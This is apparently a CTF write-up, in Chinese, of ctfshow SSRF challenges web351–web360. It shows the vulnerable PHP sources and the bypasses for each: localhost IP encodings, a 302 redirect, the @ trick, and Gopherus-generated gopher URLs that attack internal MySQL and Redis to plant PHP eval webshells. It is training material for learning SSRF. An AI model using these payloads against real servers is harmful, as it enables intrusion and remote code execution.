web351:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php  
// 开启PHP文件  
  
error_reporting(0);  
// 这行代码将PHP的错误报告级别设置为0,意味着关闭所有错误和警告的显示。这通常用于生产环境,以避免暴露敏感信息或错误信息给用户。然而,在开发过程中,保持错误报告开启是推荐的做法,以便及时发现和修复问题。  
  
highlight_file(__FILE__);  
// `highlight_file()` 函数将指定的文件(这里是当前执行的文件,由 __FILE__ 魔术常量提供)的内容作为HTML格式的高亮源代码输出。这通常用于学习或展示代码,但在生产环境中可能会导致敏感信息泄露。  
  
$url=$_POST['url'];  
// 这行代码从全局变量`$_POST`数组中获取键名为'url'的值,并将其赋值给变量`$url`。这意味着代码期望通过POST请求接收一个名为'url'的参数。  
  
$ch=curl_init($url);  
// 使用`curl_init()`函数初始化一个新的cURL会话,并将之前获取的`$url`作为参数传递给该函数。该函数返回一个cURL会话句柄,该句柄用于后续的所有cURL函数调用,并存储在变量`$ch`中。  
  
curl_setopt($ch, CURLOPT_HEADER, 0);  
// 通过`curl_setopt()`函数设置cURL传输选项。这里,`CURLOPT_HEADER`选项被设置为0,表示在获取的内容中不包含HTTP头部。这通常是可取的,因为大多数时候我们只关心HTTP响应体(即网页内容)。  
  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
// 再次使用`curl_setopt()`函数设置cURL传输选项。这次,`CURLOPT_RETURNTRANSFER`选项被设置为1,表示将cURL执行的结果作为字符串返回,而不是直接输出。这使得我们可以将结果存储在变量中供后续使用。  
  
$result=curl_exec($ch);  
// 调用`curl_exec()`函数执行cURL会话。它会发送一个请求到`curl_init()`函数指定的URL,并返回执行结果。这里,执行结果被存储在变量`$result`中。如果请求失败,`curl_exec()`将返回`FALSE`。  
  
curl_close($ch);  
// 使用`curl_close()`函数关闭cURL会话,并释放与之关联的所有资源。这是一个好习惯,可以避免资源泄露。  
  
echo ($result);  
// 最后,使用`echo`语句输出变量`$result`的内容,即cURL请求的结果。如果请求成功,这将输出请求的网页内容;如果请求失败(并且没有进行错误处理),则不会输出任何内容(除非之前关闭了错误报告)。  
  
?>  
// 结束PHP文件

​ 扫后台扫到了flag.php,由此,访问之后发现非本地无法访问,所以直接ssrf读文件:

1
url=http://127.0.0.1/flag.php

web352:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>
1
mixed parse_url ( string $url [, int $component = -1 ] )

​ 本函数解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分。

​ 这道题过滤了localhost和127.0.0,绕过方式挺多的:

1
2
3
4
5
url=http://0x7F.0.0.1/flag.php   16进制
url=http://0177.0.0.1/flag.php    8进制
url=http://0.0.0.0/flag.php
url=http://0/flag.php
url=http://127.127.127.127/flag.php

web353:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

​ 过滤了127.0.和句号,那么,绕过有下面的:IP地址进制转换网站

1
2
3
4
5
6
7
8
9
10
11
12
13
14
十六进制
url=http://0x7F.0.0.1/flag.php
八进制
url=http://0177.0.0.1/flag.php
10 进制整数格式
url=http://2130706433/flag.php
16 进制整数格式,还是上面那个网站转换记得前缀0x
url=http://0x7F000001/flag.php
还有一种特殊的省略模式
127.0.0.1写成127.1
用CIDR绕过localhost
url=http://127.127.127.127/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php

web354:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

​ 过滤了1和0,之类可以利用解析到127.0.0.1的域名作为绕过或者302,前者:SSRF域名解析到127.0.0.1

​ 这里的payload :http://safe.taobao.com/flag.php。

web355:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

​ 这里要求长度小于五,直接用http://0/flag.php去绕过。

web356:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

​ 长度小于3,还是上一题那个payload一把梭。

web357:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?>

​ ai的解释如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php  
// 关闭PHP的错误报告,这意味着任何错误或警告都不会显示给用户  
error_reporting(0);  
  
// 高亮显示当前文件的源代码。这通常用于调试目的,但在生产环境中显示源代码是不安全的。  
highlight_file(__FILE__);  
  
// 从POST请求中获取名为'url'的参数值,并将其存储在变量$url中  
$url=$_POST['url'];  
  
// 使用parse_url函数解析$url,并将解析结果存储在数组$x中  
$x=parse_url($url);  
  
// 检查$x数组中的'scheme'键是否等于'http'或'https'  
// 这是为了确保只处理HTTP或HTTPS协议的URL,从而避免潜在的协议漏洞(如URL重定向攻击)  
if($x['scheme']==='http'||$x['scheme']==='https'){  
    // 使用gethostbyname函数获取$url中主机名的IP地址,并将其存储在变量$ip中  
    $ip = gethostbyname($x['host']);  
      
    // 输出获取的IP地址,前面加上HTML的换行标签  
    echo '</br>'.$ip.'</br>';  
      
    // 使用filter_var函数和FILTER_VALIDATE_IP过滤器来验证$ip是否为有效的IP地址  
    // 同时,使用FILTER_FLAG_NO_PRIV_RANGE和FILTER_FLAG_NO_RES_RANGE标志来排除私有和保留的IP地址范围  
    // 如果$ip不是有效的非私有/非保留IP地址,则执行die函数,终止脚本执行并输出'ip!'  
    if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {  
        die('ip!');  
    }  
      
    // 如果IP地址验证通过,则使用file_get_contents函数尝试从用户提交的URL中获取内容,并输出  
    echo file_get_contents($_POST['url']);  
}  
else{  
    // 如果$url的协议不是HTTP或HTTPS,则执行die函数,终止脚本执行并输出'scheme'  
    die('scheme');  
}  
?>

​ 这里打302跳转,在公网服务器上写入如下代码:

1
2
3
<?php
header("Location: http://127.0.0.1:80/flag.php",TRUE,302);
?>

​ 之后使用如下命令临时运行:

php -S 0.0.0.0:2333

​ 传入url参数为:

url=http://:端口

web358:

1
2
3
4
5
6
7
8
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

​ 这里使用正则表达式检查$url是否以”http://ctf."开头,并且以".show"结尾(不区分大小写), 前面呢就利用@符号就可以绕过,后面利用get传参方式绕过:

http://ctf.@127.0.0.1/flag.php?show

web359:

​ 随便输入了一个账号密码后,跳转到check.php文件,抓包后post出现了一个returl,由此,利用gopher协议构造攻击,利用gopherus生成gopher语句攻击。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿MSI)-[/home/g01den/Tools/Gopherus]
└─# python2 gopherus.py --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: root
Give query to execute: select "<?php @eval($_POST["cmd"]);?>" into outfile '/var/www/html/2.php';

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%22%63%6d%64%22%5d%29%3b%3f%e3%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%32%2e%70%68%70%27%3b%01%00%00%00%01

-----------Made-by-SpyD3r-----------

​ 生成的gopher协议不能直接用,需要经过url编码之后才能用:

1
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254c%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2522%2563%256d%2564%2522%255d%2529%253b%253f%25e3%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2532%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

​ 不知道为啥,我自己的payload用不了,贴一个别人的吧:

1
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2545%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2522%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2522%2501%2500%2500%2500%2501

​ 之后访问1.php用post传一个1=system(“cat+/flag.txt”);即可。

web360:

1
2
3
4
5
6
7
8
9
10
11
 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

​ 这么用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root㉿MSI)-[/home/g01den/Tools/Gopherus]
└─# python2 gopherus.py --exploit redis


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$


Ready To get SHELL

What do you want?? (ReverseShell/PHPShell): php

Give web root location of server (default is /var/www/html):
Give PHP Payload (We have default PHP Shell): <?php eval($_post[1]);?>

Your gopher link is Ready to get PHP Shell:

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_post%5B1%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.

-----------Made-by-SpyD3r-----------

​ 不知为啥,我的还是用不了,不过,照理来说,发送了之后访问shell.php就能rce了。